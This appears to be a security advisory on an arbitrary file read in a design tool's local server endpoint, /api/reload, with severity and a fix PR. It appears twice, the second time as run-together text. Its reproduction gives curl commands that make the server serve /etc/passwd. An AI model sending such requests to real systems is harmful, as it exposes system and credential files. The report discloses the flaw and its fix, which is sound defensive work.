Summary
design/src/serve.ts:177-186 — The /api/reload endpoint reads body.html from the POST request body and passes it directly to fs.readFileSync() with only an existsSync() check. Any file readable by the process can be served as HTML through the / endpoint.
Reproduction
# Start the design serve command
$D serve /path/to/board.html
# From another terminal, reload with an arbitrary path
curl -X POST http://127.0.0.1:<port>/api/reload \
-H 'Content-Type: application/json' \
-d '{"html": "/etc/passwd"}'
# Then fetch the served page — contains /etc/passwd content
curl http://127.0.0.1:<port>/Severity
High — arbitrary file read via localhost HTTP server.
Fix
PR #664 anchors all file reads to the initial HTML file's parent directory using realpathSync, blocking symlink and traversal attacks. 3 integration tests added.
Found via sqry AST-based semantic code graph analysis.
Summary
design/src/serve.ts:177-186— The/api/reloadendpoint readsbody.htmlfrom the POST request body and passes it directly tofs.readFileSync()with only anexistsSync()check. Any file readable by the process can be served as HTML through the/endpoint.Reproduction
Severity
High — arbitrary file read via localhost HTTP server.
Fix
PR #664 anchors all file reads to the initial HTML file's parent directory using
realpathSync, blocking symlink and traversal attacks. 3 integration tests added.Found via sqry AST-based semantic code graph analysis.